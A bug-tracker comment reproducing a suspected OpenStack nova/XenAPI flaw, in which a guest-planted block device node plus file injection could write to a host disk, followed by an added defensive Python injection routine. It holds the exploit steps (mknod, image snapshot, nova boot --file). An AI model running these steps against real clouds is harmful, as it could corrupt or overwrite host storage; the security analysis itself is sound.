Comment 20 for bug 1552042

Bob Ball (bob-ball) wrote:

After an attempted repro, I'm not convinced that XenAPI is vulnerable:

stack@DevStackOSDomU:~$ grep flat_injected /etc/nova/nova.conf
flat_injected = True

stack@DevStackOSDomU:~$ lsblk | grep xvdb
xvdb 202:16 0 1G 0 disk

stack@DevStackOSDomU:~$ nova boot --image cirros-0.3.4-x86_64-disk --flavor 1 NodevFix
stack@DevStackOSDomU:~$ nova list | grep NodevFix
| 23db106a-321d-4033-8368-cc6d91d3d307 | NodevFix | ACTIVE | - | Running | private=10.0.0.2 |

stack@DevStackOSDomU:~$ ssh cirros@10.0.0.2 sudo mknod /host-device b 202 16
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.2 sudo sync

stack@DevStackOSDomU:~$ nova image-create 23db106a-321d-4033-8368-cc6d91d3d307 ImageWithDev

stack@DevStackOSDomU:~$ echo "Before running an instance" | sudo tee /dev/xvdb
stack@DevStackOSDomU:~$ echo "After running an instance" > test-file

stack@DevStackOSDomU:~$ nova boot --file /host-device=test-file --image 508c35dd-dc18-40d5-82f1-58b0180520a8 --flavor 1 NodevFix_exploit
stack@DevStackOSDomU:~$ strings /dev/xvdb
Before running an instance

stack@DevStackOSDomU:~$ nova list | grep NodevFix_exploit
| ba73ef12-a60a-4e91-b4a0-3046db5131ba | NodevFix_exploit | ACTIVE | - | Running | private=10.0.0.6 |

stack@DevStackOSDomU:~$ ssh cirros@10.0.0.6 sudo cat /host-device
After running an instance
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.6 sudo ls -altr /host-device
-r--r----- 1 root root 26 May 31 15:13 /host-device

And just to check what happened without the file injection:
stack@DevStackOSDomU:~$ nova boot --image 508c35dd-dc18-40d5-82f1-58b0180520a8 --flavor 1 NodevFix_NoInject
stack@DevStackOSDomU:~$ nova list | grep NodevFix_NoInject
| fc3f1a45-6048-4abf-82a5-5b9b352c59fe | NodevFix_NoInject | ACTIVE | - | Running | private=10.0.0.8 |
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.8 sudo ls -altr /host-device
brw------- 1 root root 202, 16 May 31 15:06 /host-device

As such, it *looks* like the way XenAPI uses vfs will replace the mknod device with the requested file?
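The behaviour Bob observes (the planted device node is replaced by the requested file rather than written through) is the property a defensive injection routine should guarantee. The following Python is an added example, not code from this bug thread, from nova or from the XenAPI driver: `inject_file` and `demo` are hypothetical names, `root` is assumed to be the mounted guest filesystem, and a FIFO stands in for the guest's `mknod` block device because creating one needs no privileges. It walks the target path without following symlinks, refuses `..`, and unlinks any existing non-directory object before creating a fresh regular file with `O_EXCL`.

```python
import os
import stat
import tempfile

# Added example (not from the bug thread, nova or XenAPI): a file-injection
# routine that replaces whatever sits at the target path instead of writing
# through it, so a device node planted inside the guest image cannot turn the
# injected write into a write to a host block device.

def inject_file(root, guest_path, data, mode=0o640):
    """Write ``data`` to ``guest_path`` inside the mounted guest tree ``root``.

    Returns what was found at the target before injection: one character in
    the style of ``stat.filemode`` ('-' regular file, 'b' block device,
    'p' FIFO, 'l' symlink, ...) or 'absent'.  Directory components are opened
    with O_NOFOLLOW, so a symlinked directory inside the image raises OSError;
    '..' components are rejected; any existing non-directory object at the
    target is unlinked and recreated as a brand-new regular file.
    """
    parts = [p for p in guest_path.split("/") if p and p != "."]
    if not parts or ".." in parts:
        raise ValueError("refusing to inject to %r" % guest_path)

    dir_fd = os.open(root, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for comp in parts[:-1]:
            # O_NOFOLLOW: fails with ELOOP if the guest turned this component into a symlink
            next_fd = os.open(comp, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW,
                              dir_fd=dir_fd)
            os.close(dir_fd)
            dir_fd = next_fd

        name = parts[-1]
        try:
            st = os.lstat(name, dir_fd=dir_fd)
        except FileNotFoundError:
            previous = "absent"
        else:
            if stat.S_ISDIR(st.st_mode):
                raise IsADirectoryError(guest_path)
            previous = stat.filemode(st.st_mode)[0]
            # Never write through an existing object, whatever kind it is.
            os.unlink(name, dir_fd=dir_fd)

        # O_EXCL | O_NOFOLLOW: the data lands in a new regular file or the call fails.
        fd = os.open(name, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW,
                     mode, dir_fd=dir_fd)
        with os.fdopen(fd, "wb") as f:
            f.write(data)
    finally:
        os.close(dir_fd)
    return previous


def demo():
    """Build a throwaway guest tree (constructed test data) and exercise the routine."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        # Stand-in for the guest's `mknod /host-device b 202 16`: a FIFO is also a
        # special file, but creating it needs no root privileges.
        os.mkfifo(os.path.join(root, "host-device"))
        results["before"] = inject_file(root, "/host-device", b"After running an instance\n")
        st = os.lstat(os.path.join(root, "host-device"))
        results["after"] = stat.filemode(st.st_mode)[0]
        with open(os.path.join(root, "host-device"), "rb") as f:
            results["content"] = f.read()

        # A symlinked directory component inside the image is refused, not followed.
        os.symlink("/", os.path.join(root, "etc"))
        try:
            inject_file(root, "etc/motd", b"x")
            results["symlink_dir_rejected"] = False
        except OSError:
            results["symlink_dir_rejected"] = True

        # Path traversal out of the image root is refused.
        try:
            inject_file(root, "../outside", b"x")
            results["traversal_rejected"] = False
        except ValueError:
            results["traversal_rejected"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

Running `demo()` reports the FIFO (`'p'`) found at `/host-device` before injection and a regular file (`'-'`) holding the injected bytes afterwards, which is the same outcome as the `ls -altr` results above: the special file is gone and the injected content was never written to the device it named.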